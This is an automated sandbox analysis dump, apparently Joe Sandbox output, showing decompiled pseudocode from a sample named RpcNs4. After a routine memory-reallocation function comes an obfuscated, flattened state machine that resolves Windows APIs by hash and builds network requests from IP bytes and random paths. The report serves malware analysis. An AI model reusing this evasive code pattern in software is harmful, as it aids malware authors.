                                                                                                      • Instruction Fuzzy Hash: 3101BBB0C40209ABEF009FE0D95D79EBFB8BB08304F108559E515BA290D7BA46148F98
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 95%
                                                                                                      			E0040F8E6(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                                                                      				void* _t7;
                                                                                                      				void* _t8;
                                                                                                      				intOrPtr* _t9;
                                                                                                      				intOrPtr* _t12;
                                                                                                      				void* _t20;
                                                                                                      				long _t31;
                                                                                                      
                                                                                                      				if(_a4 != 0) {
                                                                                                      					_t31 = _a8;
                                                                                                      					if(_t31 != 0) {
                                                                                                      						_push(__ebx);
                                                                                                      						while(_t31 <= 0xffffffe0) {
                                                                                                      							if(_t31 == 0) {
                                                                                                      								_t31 = _t31 + 1;
                                                                                                      							}
                                                                                                      							_t7 = HeapReAlloc( *0x43735c, 0, _a4, _t31);
                                                                                                      							_t20 = _t7;
                                                                                                      							if(_t20 != 0) {
                                                                                                      								L17:
                                                                                                      								_t8 = _t20;
                                                                                                      							} else {
                                                                                                      								if( *0x437358 == _t7) {
                                                                                                      									_t9 = E00403FAC();
                                                                                                      									 *_t9 = E00404005(GetLastError());
                                                                                                      									goto L17;
                                                                                                      								} else {
                                                                                                      									if(E004036E7(_t7, _t31) == 0) {
                                                                                                      										_t12 = E00403FAC();
                                                                                                      										 *_t12 = E00404005(GetLastError());
                                                                                                      										L12:
                                                                                                      										_t8 = 0;
                                                                                                      									} else {
                                                                                                      										continue;
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      							goto L14;
                                                                                                      						}
                                                                                                      						E004036E7(_t6, _t31);
                                                                                                      						 *((intOrPtr*)(E00403FAC())) = 0xc;
                                                                                                      						goto L12;
                                                                                                      					} else {
                                                                                                      						E00402CB3(_a4);
                                                                                                      						_t8 = 0;
                                                                                                      					}
                                                                                                      					L14:
                                                                                                      					return _t8;
                                                                                                      				} else {
                                                                                                      					return E004025D7(__ebx, __edx, __edi, _a8);
                                                                                                      				}
                                                                                                      			}









                                                                                                      0x0040f8ed
                                                                                                      0x0040f8fb
                                                                                                      0x0040f900
                                                                                                      0x0040f90f
                                                                                                      0x0040f942
                                                                                                      0x0040f914
                                                                                                      0x0040f916
                                                                                                      0x0040f916
                                                                                                      0x0040f923
                                                                                                      0x0040f929
                                                                                                      0x0040f92d
                                                                                                      0x0040f98d
                                                                                                      0x0040f98d
                                                                                                      0x0040f92f
                                                                                                      0x0040f935
                                                                                                      0x0040f977
                                                                                                      0x0040f98b
                                                                                                      0x00000000
                                                                                                      0x0040f937
                                                                                                      0x0040f940
                                                                                                      0x0040f95f
                                                                                                      0x0040f973
                                                                                                      0x0040f959
                                                                                                      0x0040f959
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040f940
                                                                                                      0x0040f935
                                                                                                      0x00000000
                                                                                                      0x0040f95b
                                                                                                      0x0040f948
                                                                                                      0x0040f953
                                                                                                      0x00000000
                                                                                                      0x0040f902
                                                                                                      0x0040f905
                                                                                                      0x0040f90b
                                                                                                      0x0040f90b
                                                                                                      0x0040f95c
                                                                                                      0x0040f95e
                                                                                                      0x0040f8ef
                                                                                                      0x0040f8f9
                                                                                                      0x0040f8f9

                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 0040F8F2
                                                                                                        • Part of subcall function 004025D7: __FF_MSGBANNER.LIBCMT ref: 004025EE
                                                                                                        • Part of subcall function 004025D7: __NMSG_WRITE.LIBCMT ref: 004025F5
                                                                                                        • Part of subcall function 004025D7: RtlAllocateHeap.NTDLL(00610000,00000000,00000001,00000000,00000000,00000000,?,0040D04F,00000000,00000000,00000000,00000000,?,00406E45,00000018,00434500), ref: 0040261A
                                                                                                      • _free.LIBCMT ref: 0040F905
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1020059152-0
                                                                                                      • Opcode ID: 7a0ca71ea7ed07806f718cd88403afa96b90f780b46ebdba71b186e10baf8954
                                                                                                      • Instruction ID: 7eca6f38aeb7a3005b5944069fb91ed30c7bffdeea9973184b42a437568cbb77
                                                                                                      • Opcode Fuzzy Hash: 7a0ca71ea7ed07806f718cd88403afa96b90f780b46ebdba71b186e10baf8954
                                                                                                      • Instruction Fuzzy Hash: E011E7B2804612BBCF313F71AC0475A3BA8AF44368F20443BF945B66D1DB3D8D44969C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 78%
                                                                                                      			E020B12B0(char __ecx, signed int __edx, intOrPtr* _a4) {
                                                                                                      				char _v2048;
                                                                                                      				char _v2560;
                                                                                                      				char _v2688;
                                                                                                      				char _v2816;
                                                                                                      				intOrPtr _v2820;
                                                                                                      				intOrPtr _v2824;
                                                                                                      				char _v2828;
                                                                                                      				char _v2836;
                                                                                                      				char _v2844;
                                                                                                      				intOrPtr _v2848;
                                                                                                      				char _v2852;
                                                                                                      				intOrPtr _v2856;
                                                                                                      				char _v2860;
                                                                                                      				intOrPtr _v2864;
                                                                                                      				char _v2868;
                                                                                                      				intOrPtr* _v2872;
                                                                                                      				signed int _v2876;
                                                                                                      				signed int _v2880;
                                                                                                      				char _v2884;
                                                                                                      				signed int _v2888;
                                                                                                      				signed int _v2892;
                                                                                                      				intOrPtr* _v2896;
                                                                                                      				intOrPtr _v2900;
                                                                                                      				void* __ebx;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t107;
                                                                                                      				signed int _t108;
                                                                                                      				intOrPtr* _t113;
                                                                                                      				signed int _t119;
                                                                                                      				signed int _t123;
                                                                                                      				intOrPtr* _t126;
                                                                                                      				intOrPtr* _t128;
                                                                                                      				signed int _t137;
                                                                                                      				void* _t141;
                                                                                                      				signed char* _t148;
                                                                                                      				intOrPtr* _t159;
                                                                                                      				void* _t165;
                                                                                                      				signed int _t167;
                                                                                                      				intOrPtr* _t177;
                                                                                                      				void* _t180;
                                                                                                      				intOrPtr* _t206;
                                                                                                      				intOrPtr _t229;
                                                                                                      				signed char* _t245;
                                                                                                      				signed int _t260;
                                                                                                      				short* _t261;
                                                                                                      				void* _t263;
                                                                                                      				short* _t264;
                                                                                                      				void* _t266;
                                                                                                      				void* _t268;
                                                                                                      				void* _t270;
                                                                                                      				intOrPtr* _t272;
                                                                                                      				signed int _t276;
                                                                                                      				char _t277;
                                                                                                      				intOrPtr* _t278;
                                                                                                      				intOrPtr* _t279;
                                                                                                      				void* _t281;
                                                                                                      				void* _t283;
                                                                                                      				void* _t284;
                                                                                                      				void* _t285;
                                                                                                      
                                                                                                      				_t281 =  &_v2896;
                                                                                                      				_t279 = _v2860;
                                                                                                      				_v2888 = 0;
                                                                                                      				_t260 = __edx;
                                                                                                      				_v2880 = __edx;
                                                                                                      				_t107 = 0x34b824cd;
                                                                                                      				_v2884 = __ecx;
                                                                                                      				_v2896 = _v2856;
                                                                                                      				_v2872 = _t279;
                                                                                                      				while(1) {
                                                                                                      					L1:
                                                                                                      					_t177 = _a4;
                                                                                                      					while(1) {
                                                                                                      						_t241 = _v2892;
                                                                                                      						do {
                                                                                                      							while(1) {
                                                                                                      								L3:
                                                                                                      								_t283 = _t107 - 0x1eb6b95d;
                                                                                                      								if(_t283 > 0) {
                                                                                                      									break;
                                                                                                      								}
                                                                                                      								if(_t283 == 0) {
                                                                                                      									_t126 =  *0x20bddc8;
                                                                                                      									__eflags = _t126;
                                                                                                      									if(_t126 == 0) {
                                                                                                      										_t126 = E020B3DD0(_t177, E020B3E70(0xbb51e2dc), 0x298e8809, _t279);
                                                                                                      										 *0x20bddc8 = _t126;
                                                                                                      									}
                                                                                                      									_t266 =  *_t126();
                                                                                                      									_t128 =  *0x20bdbec;
                                                                                                      									__eflags = _t128;
                                                                                                      									if(_t128 == 0) {
                                                                                                      										_t128 = E020B3DD0(_t177, E020B3E70(0xbb51e2dc), 0x632f374, _t279);
                                                                                                      										 *0x20bdbec = _t128;
                                                                                                      									}
                                                                                                      									 *_t128(_t266, 0, _t279);
                                                                                                      									goto L68;
                                                                                                      								} else {
                                                                                                      									_t284 = _t107 - 0xe09be1f;
                                                                                                      									if(_t284 > 0) {
                                                                                                      										__eflags = _t107 - 0x1994374c;
                                                                                                      										if(__eflags > 0) {
                                                                                                      											__eflags = _t107 - 0x1e99af87;
                                                                                                      											if(_t107 != 0x1e99af87) {
                                                                                                      												goto L58;
                                                                                                      											} else {
                                                                                                      												_v2868 = 0;
                                                                                                      												_v2864 = 0;
                                                                                                      												_t137 = E020B2BA0( &_v2688, _t241,  &_v2560,  &_v2048,  &_v2844,  &_v2868);
                                                                                                      												_t281 = _t281 + 0x10;
                                                                                                      												asm("sbb eax, eax");
                                                                                                      												_t107 = ( ~_t137 & 0x11817f15) + 0x1fd2b00b;
                                                                                                      												while(1) {
                                                                                                      													_t241 = _v2892;
                                                                                                      													goto L3;
                                                                                                      												}
                                                                                                      											}
                                                                                                      										} else {
                                                                                                      											if(__eflags == 0) {
                                                                                                      												E020B4180(_t177, _v2836);
                                                                                                      												_t107 = 0x33f162b3;
                                                                                                      												while(1) {
                                                                                                      													_t241 = _v2892;
                                                                                                      													goto L3;
                                                                                                      												}
                                                                                                      											} else {
                                                                                                      												__eflags = _t107 - 0x11137988;
                                                                                                      												if(_t107 == 0x11137988) {
                                                                                                      													_t141 = E020B3460(0x20bd090);
                                                                                                      													_t278 =  *0x20bdf10;
                                                                                                      													_t263 = _t141;
                                                                                                      													__eflags = _t278;
                                                                                                      													if(_t278 == 0) {
                                                                                                      														_t278 = E020B3DD0(_t177, E020B3E70(0xe60124ba), 0xec538b3a, _t279);
                                                                                                      														 *0x20bdf10 = _t278;
                                                                                                      													}
                                                                                                      													_t245 =  *( *0x20be35c + 0x2c);
                                                                                                      													 *_t278( &_v2688, 0x40, _t263, _t245[3] & 0x000000ff, _t245[2] & 0x000000ff, _t245[1] & 0x000000ff,  *_t245 & 0x000000ff);
                                                                                                      													_t281 = _t281 + 0x1c;
                                                                                                      													E020B3400(_t263);
                                                                                                      													_t260 = _v2880;
                                                                                                      													_t277 = _v2884;
                                                                                                      													_t148 =  *( *0x20be35c + 0x2c);
                                                                                                      													_t241 = _t148[4] & 0x0000ffff;
                                                                                                      													_t107 = 0x5ac3e84;
                                                                                                      													_v2892 = _t148[4] & 0x0000ffff;
                                                                                                      													continue;
                                                                                                      												} else {
                                                                                                      													__eflags = _t107 - 0x14d5ed4a;
                                                                                                      													if(_t107 != 0x14d5ed4a) {
                                                                                                      														goto L58;
                                                                                                      													} else {
                                                                                                      														E020B4180(_t177, _v2868);
                                                                                                      														_t107 = 0x1fd2b00b;
                                                                                                      														while(1) {
                                                                                                      															_t241 = _v2892;
                                                                                                      															goto L3;
                                                                                                      														}
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										if(_t284 == 0) {
                                                                                                      											_t268 =  *(_t260 + 4) + (0x51eb851f *  *(_t260 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t260 + 4) >> 0x20 >> 5);
                                                                                                      											_t279 = E020B4220(_t177, _t268);
                                                                                                      											_v2872 = _t279;
                                                                                                      											__eflags = _t279;
                                                                                                      											if(_t279 == 0) {
                                                                                                      												L68:
                                                                                                      												return _v2900;
                                                                                                      											} else {
                                                                                                      												_push(_t268);
                                                                                                      												_push(_t279);
                                                                                                      												_t206 = E020B5B30( *_t260,  *(_t260 + 4), _t279);
                                                                                                      												_t281 = _t281 + 8;
                                                                                                      												_v2896 = _t206;
                                                                                                      												__eflags = _t206;
                                                                                                      												if(_t206 == 0) {
                                                                                                      													E020B4180(_t177, _t279);
                                                                                                      													return _v2888;
                                                                                                      												} else {
                                                                                                      													_t107 = 0x202b0a47;
                                                                                                      													while(1) {
                                                                                                      														_t241 = _v2892;
                                                                                                      														goto L3;
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										} else {
                                                                                                      											_t285 = _t107 - 0xa20cd0f;
                                                                                                      											if(_t285 > 0) {
                                                                                                      												__eflags = _t107 - 0xb290b63;
                                                                                                      												if(_t107 != 0xb290b63) {
                                                                                                      													goto L58;
                                                                                                      												} else {
                                                                                                      													_t270 = E020B3460(0x20bd100);
                                                                                                      													_t159 =  *0x20bdf10;
                                                                                                      													__eflags = _t159;
                                                                                                      													if(_t159 == 0) {
                                                                                                      														_t159 = E020B3DD0(_t177, E020B3E70(0xe60124ba), 0xec538b3a, _t279);
                                                                                                      														 *0x20bdf10 = _t159;
                                                                                                      													}
                                                                                                      													 *_t159( &_v2048, 0x400, _t270,  &_v2688,  &_v2560,  &_v2816);
                                                                                                      													_t281 = _t281 + 0x18;
                                                                                                      													E020B3400(_t270);
                                                                                                      													_t107 = 0x20a98e65;
                                                                                                      													while(1) {
                                                                                                      														_t241 = _v2892;
                                                                                                      														goto L3;
                                                                                                      													}
                                                                                                      												}
                                                                                                      											} else {
                                                                                                      												if(_t285 == 0) {
                                                                                                      													 *((intOrPtr*)(_t177 + 4)) =  *_v2852;
                                                                                                      													_t272 = E020B4220(_t177,  *_v2852);
                                                                                                      													 *_t177 = _t272;
                                                                                                      													__eflags = _t272;
                                                                                                      													if(_t272 != 0) {
                                                                                                      														_push( *((intOrPtr*)(_t177 + 4)));
                                                                                                      														_push(_t272);
                                                                                                      														_t165 = E020B5750(_v2848 - 4);
                                                                                                      														_t281 = _t281 + 8;
                                                                                                      														__eflags = 0 - _t165;
                                                                                                      														asm("sbb edi, edi");
                                                                                                      														_v2888 =  ~_t260;
                                                                                                      														if(0 == _t165) {
                                                                                                      															E020B4180(_t177,  *_t177);
                                                                                                      														}
                                                                                                      														_t260 = _v2880;
                                                                                                      													}
                                                                                                      													_t107 = 0x2833dc8d;
                                                                                                      													while(1) {
                                                                                                      														_t241 = _v2892;
                                                                                                      														goto L3;
                                                                                                      													}
                                                                                                      												} else {
                                                                                                      													if(_t107 == 0x32df52c) {
                                                                                                      														_t167 = E020B2240( &_v2860,  &_v2836);
                                                                                                      														asm("sbb eax, eax");
                                                                                                      														_t107 = ( ~_t167 & 0xdd2216d5) + 0x33f162b3;
                                                                                                      														while(1) {
                                                                                                      															_t241 = _v2892;
                                                                                                      															goto L3;
                                                                                                      														}
                                                                                                      													} else {
                                                                                                      														if(_t107 != 0x5ac3e84) {
                                                                                                      															goto L58;
                                                                                                      														} else {
                                                                                                      															_t261 =  &_v2560;
                                                                                                      															_t180 = _v2876 - (0xaaaaaaab * _v2876 >> 0x20 >> 2) + (0xaaaaaaab * _v2876 >> 0x20 >> 2) * 2 + (0xaaaaaaab * _v2876 >> 0x20 >> 2) + (0xaaaaaaab * _v2876 >> 0x20 >> 2) * 2 + 1;
                                                                                                      															if(_t180 != 0) {
                                                                                                      																do {
                                                                                                      																	_t276 = (_v2876 & 0x0000000f) + 4;
                                                                                                      																	E020B4E10(_t261, _t276,  &_v2876);
                                                                                                      																	_t264 = _t261 + _t276 * 2;
                                                                                                      																	_t281 = _t281 + 4;
                                                                                                      																	 *_t264 = 0x2f;
                                                                                                      																	_t261 = _t264 + 2;
                                                                                                      																	_t180 = _t180 - 1;
                                                                                                      																} while (_t180 != 0);
                                                                                                      																_t279 = _v2872;
                                                                                                      																_t277 = _v2884;
                                                                                                      															}
                                                                                                      															 *_t261 = 0;
                                                                                                      															_t107 = 0x3114903d;
                                                                                                      															_t260 = _v2880;
                                                                                                      															goto L1;
                                                                                                      														}
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      								L69:
                                                                                                      							}
                                                                                                      							__eflags = _t107 - 0x3114903d;
                                                                                                      							if(__eflags > 0) {
                                                                                                      								__eflags = _t107 - 0x31542f20;
                                                                                                      								if(_t107 == 0x31542f20) {
                                                                                                      									_t108 = E020B1F60( &_v2868,  &_v2852);
                                                                                                      									asm("sbb eax, eax");
                                                                                                      									_t107 = ( ~_t108 & 0xf54adfc5) + 0x14d5ed4a;
                                                                                                      									_t241 = _v2892;
                                                                                                      									goto L3;
                                                                                                      								} else {
                                                                                                      									__eflags = _t107 - 0x33f162b3;
                                                                                                      									if(_t107 == 0x33f162b3) {
                                                                                                      										E020B4180(_t177, _v2860);
                                                                                                      										_t107 = 0x1eb6b95d;
                                                                                                      										while(1) {
                                                                                                      											_t241 = _v2892;
                                                                                                      											goto L3;
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										__eflags = _t107 - 0x34b824cd;
                                                                                                      										if(_t107 != 0x34b824cd) {
                                                                                                      											goto L58;
                                                                                                      										} else {
                                                                                                      											_t113 =  *0x20bdc10;
                                                                                                      											__eflags = _t113;
                                                                                                      											if(_t113 == 0) {
                                                                                                      												_t113 = E020B3DD0(_t177, E020B3E70(0xbb51e2dc), 0x8ecd1a70, _t279);
                                                                                                      												 *0x20bdc10 = _t113;
                                                                                                      											}
                                                                                                      											_v2876 =  *_t113();
                                                                                                      											_t107 = 0xe09be1f;
                                                                                                      											while(1) {
                                                                                                      												_t241 = _v2892;
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							} else {
                                                                                                      								if(__eflags == 0) {
                                                                                                      									E020B1C10( &_v2816);
                                                                                                      									_t107 = 0xb290b63;
                                                                                                      									while(1) {
                                                                                                      										_t241 = _v2892;
                                                                                                      										goto L3;
                                                                                                      									}
                                                                                                      								} else {
                                                                                                      									__eflags = _t107 - 0x20a98e65;
                                                                                                      									if(__eflags > 0) {
                                                                                                      										__eflags = _t107 - 0x2833dc8d;
                                                                                                      										if(_t107 != 0x2833dc8d) {
                                                                                                      											goto L58;
                                                                                                      										} else {
                                                                                                      											E020B4180(_t177, _v2852);
                                                                                                      											_t107 = 0x14d5ed4a;
                                                                                                      											while(1) {
                                                                                                      												_t241 = _v2892;
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										if(__eflags == 0) {
                                                                                                      											_t119 = E020B18E0( &_v2836,  &_v2816,  &_v2844);
                                                                                                      											_t229 = _v2896;
                                                                                                      											_t281 = _t281 + 4;
                                                                                                      											asm("sbb eax, eax");
                                                                                                      											_t107 = ( ~_t119 & 0x0505783b) + 0x1994374c;
                                                                                                      											while(1) {
                                                                                                      												_t241 = _v2892;
                                                                                                      												goto L3;
                                                                                                      											}
                                                                                                      										} else {
                                                                                                      											__eflags = _t107 - 0x1fd2b00b;
                                                                                                      											if(_t107 == 0x1fd2b00b) {
                                                                                                      												E020B4180(_t177, _v2844);
                                                                                                      												_t229 = _v2896;
                                                                                                      												_t107 = 0x1994374c;
                                                                                                      												while(1) {
                                                                                                      													_t241 = _v2892;
                                                                                                      													goto L3;
                                                                                                      												}
                                                                                                      											} else {
                                                                                                      												__eflags = _t107 - 0x202b0a47;
                                                                                                      												if(_t107 != 0x202b0a47) {
                                                                                                      													goto L58;
                                                                                                      												} else {
                                                                                                      													_v2820 = _t229;
                                                                                                      													_v2828 = _t277;
                                                                                                      													_v2824 = _t279;
                                                                                                      													_t123 = E020B1DF0( &_v2828,  &_v2860);
                                                                                                      													_t229 = _v2896;
                                                                                                      													asm("sbb eax, eax");
                                                                                                      													_t107 = ( ~_t123 & 0xe4773bcf) + 0x1eb6b95d;
                                                                                                      													while(1) {
                                                                                                      														_t241 = _v2892;
                                                                                                      														goto L3;
                                                                                                      													}
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      							goto L69;
                                                                                                      							L58:
                                                                                                      							__eflags = _t107 - 0x198d893d;
                                                                                                      						} while (_t107 != 0x198d893d);
                                                                                                      						return _v2888;
                                                                                                      						goto L69;
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}






























































                                                                                                      0x020b12b0
                                                                                                      0x020b12b8
                                                                                                      0x020b12c2
                                                                                                      0x020b12ca
                                                                                                      0x020b12cc
                                                                                                      0x020b12d0
                                                                                                      0x020b12d5
                                                                                                      0x020b12d9
                                                                                                      0x020b12dd
                                                                                                      0x020b12e1
                                                                                                      0x020b12e1
                                                                                                      0x020b12e1
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b12f0
                                                                                                      0x020b12f0
                                                                                                      0x020b12f0
                                                                                                      0x020b12f0
                                                                                                      0x020b12f5
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x020b12fb
                                                                                                      0x020b17bc
                                                                                                      0x020b17c1
                                                                                                      0x020b17c3
                                                                                                      0x020b17d6
                                                                                                      0x020b17db
                                                                                                      0x020b17db
                                                                                                      0x020b17e2
                                                                                                      0x020b17e4
                                                                                                      0x020b17e9
                                                                                                      0x020b17eb
                                                                                                      0x020b17fe
                                                                                                      0x020b1803
                                                                                                      0x020b1803
                                                                                                      0x020b180c
                                                                                                      0x00000000
                                                                                                      0x020b1301
                                                                                                      0x020b1301
                                                                                                      0x020b1306
                                                                                                      0x020b14f3
                                                                                                      0x020b14f8
                                                                                                      0x020b15d1
                                                                                                      0x020b15d6
                                                                                                      0x00000000
                                                                                                      0x020b15dc
                                                                                                      0x020b15e0
                                                                                                      0x020b15ed
                                                                                                      0x020b160d
                                                                                                      0x020b1616
                                                                                                      0x020b161b
                                                                                                      0x020b1622
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b14fe
                                                                                                      0x020b14fe
                                                                                                      0x020b15be
                                                                                                      0x020b15c7
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b1504
                                                                                                      0x020b1504
                                                                                                      0x020b1509
                                                                                                      0x020b1532
                                                                                                      0x020b1537
                                                                                                      0x020b153d
                                                                                                      0x020b153f
                                                                                                      0x020b1541
                                                                                                      0x020b1559
                                                                                                      0x020b155b
                                                                                                      0x020b155b
                                                                                                      0x020b1567
                                                                                                      0x020b1588
                                                                                                      0x020b158a
                                                                                                      0x020b158f
                                                                                                      0x020b159d
                                                                                                      0x020b15a1
                                                                                                      0x020b15a5
                                                                                                      0x020b15a8
                                                                                                      0x020b15ac
                                                                                                      0x020b15b1
                                                                                                      0x00000000
                                                                                                      0x020b150b
                                                                                                      0x020b150b
                                                                                                      0x020b1510
                                                                                                      0x00000000
                                                                                                      0x020b1516
                                                                                                      0x020b151a
                                                                                                      0x020b1523
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b1510
                                                                                                      0x020b1509
                                                                                                      0x020b14fe
                                                                                                      0x020b130c
                                                                                                      0x020b130c
                                                                                                      0x020b14b1
                                                                                                      0x020b14ba
                                                                                                      0x020b14bc
                                                                                                      0x020b14c0
                                                                                                      0x020b14c2
                                                                                                      0x020b180e
                                                                                                      0x020b181c
                                                                                                      0x020b14c8
                                                                                                      0x020b14cd
                                                                                                      0x020b14ce
                                                                                                      0x020b14d4
                                                                                                      0x020b14d6
                                                                                                      0x020b14d9
                                                                                                      0x020b14dd
                                                                                                      0x020b14df
                                                                                                      0x020b17a8
                                                                                                      0x020b17bb
                                                                                                      0x020b14e5
                                                                                                      0x020b14e9
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b14df
                                                                                                      0x020b1312
                                                                                                      0x020b1312
                                                                                                      0x020b1317
                                                                                                      0x020b1425
                                                                                                      0x020b142a
                                                                                                      0x00000000
                                                                                                      0x020b1430
                                                                                                      0x020b143a
                                                                                                      0x020b143c
                                                                                                      0x020b1441
                                                                                                      0x020b1443
                                                                                                      0x020b1456
                                                                                                      0x020b145b
                                                                                                      0x020b145b
                                                                                                      0x020b1483
                                                                                                      0x020b1485
                                                                                                      0x020b148a
                                                                                                      0x020b1493
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b131d
                                                                                                      0x020b131d
                                                                                                      0x020b13d0
                                                                                                      0x020b13d8
                                                                                                      0x020b13da
                                                                                                      0x020b13dc
                                                                                                      0x020b13de
                                                                                                      0x020b13e8
                                                                                                      0x020b13f1
                                                                                                      0x020b13f2
                                                                                                      0x020b13f9
                                                                                                      0x020b13fc
                                                                                                      0x020b13fe
                                                                                                      0x020b1402
                                                                                                      0x020b1406
                                                                                                      0x020b140a
                                                                                                      0x020b140a
                                                                                                      0x020b140f
                                                                                                      0x020b140f
                                                                                                      0x020b1417
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b1323
                                                                                                      0x020b1328
                                                                                                      0x020b13ae
                                                                                                      0x020b13b9
                                                                                                      0x020b13c0
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b132a
                                                                                                      0x020b132f
                                                                                                      0x00000000
                                                                                                      0x020b1335
                                                                                                      0x020b1339
                                                                                                      0x020b1351
                                                                                                      0x020b1352
                                                                                                      0x020b1360
                                                                                                      0x020b136d
                                                                                                      0x020b1373
                                                                                                      0x020b1378
                                                                                                      0x020b137b
                                                                                                      0x020b137e
                                                                                                      0x020b1381
                                                                                                      0x020b1384
                                                                                                      0x020b1384
                                                                                                      0x020b1387
                                                                                                      0x020b138f
                                                                                                      0x020b138f
                                                                                                      0x020b1395
                                                                                                      0x020b1398
                                                                                                      0x020b139d
                                                                                                      0x00000000
                                                                                                      0x020b139d
                                                                                                      0x020b132f
                                                                                                      0x020b1328
                                                                                                      0x020b131d
                                                                                                      0x020b1317
                                                                                                      0x020b130c
                                                                                                      0x020b1306
                                                                                                      0x00000000
                                                                                                      0x020b12fb
                                                                                                      0x020b162c
                                                                                                      0x020b1631
                                                                                                      0x020b1704
                                                                                                      0x020b1709
                                                                                                      0x020b178a
                                                                                                      0x020b1795
                                                                                                      0x020b179c
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b170b
                                                                                                      0x020b170b
                                                                                                      0x020b1710
                                                                                                      0x020b176f
                                                                                                      0x020b1778
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b1712
                                                                                                      0x020b1712
                                                                                                      0x020b1717
                                                                                                      0x00000000
                                                                                                      0x020b1719
                                                                                                      0x020b1719
                                                                                                      0x020b171e
                                                                                                      0x020b1720
                                                                                                      0x020b1733
                                                                                                      0x020b1738
                                                                                                      0x020b1738
                                                                                                      0x020b1743
                                                                                                      0x020b1747
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b1717
                                                                                                      0x020b1710
                                                                                                      0x020b1637
                                                                                                      0x020b1637
                                                                                                      0x020b16f1
                                                                                                      0x020b16fa
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b163d
                                                                                                      0x020b163d
                                                                                                      0x020b1642
                                                                                                      0x020b16cf
                                                                                                      0x020b16d4
                                                                                                      0x00000000
                                                                                                      0x020b16d6
                                                                                                      0x020b16da
                                                                                                      0x020b16e3
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b1648
                                                                                                      0x020b1648
                                                                                                      0x020b16b0
                                                                                                      0x020b16b5
                                                                                                      0x020b16b9
                                                                                                      0x020b16be
                                                                                                      0x020b16c5
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b164a
                                                                                                      0x020b164a
                                                                                                      0x020b164f
                                                                                                      0x020b1690
                                                                                                      0x020b1695
                                                                                                      0x020b1699
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b1651
                                                                                                      0x020b1651
                                                                                                      0x020b1656
                                                                                                      0x00000000
                                                                                                      0x020b165c
                                                                                                      0x020b165c
                                                                                                      0x020b1668
                                                                                                      0x020b166c
                                                                                                      0x020b1670
                                                                                                      0x020b1675
                                                                                                      0x020b167b
                                                                                                      0x020b1682
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x00000000
                                                                                                      0x020b12e8
                                                                                                      0x020b12e8
                                                                                                      0x020b1656
                                                                                                      0x020b164f
                                                                                                      0x020b1648
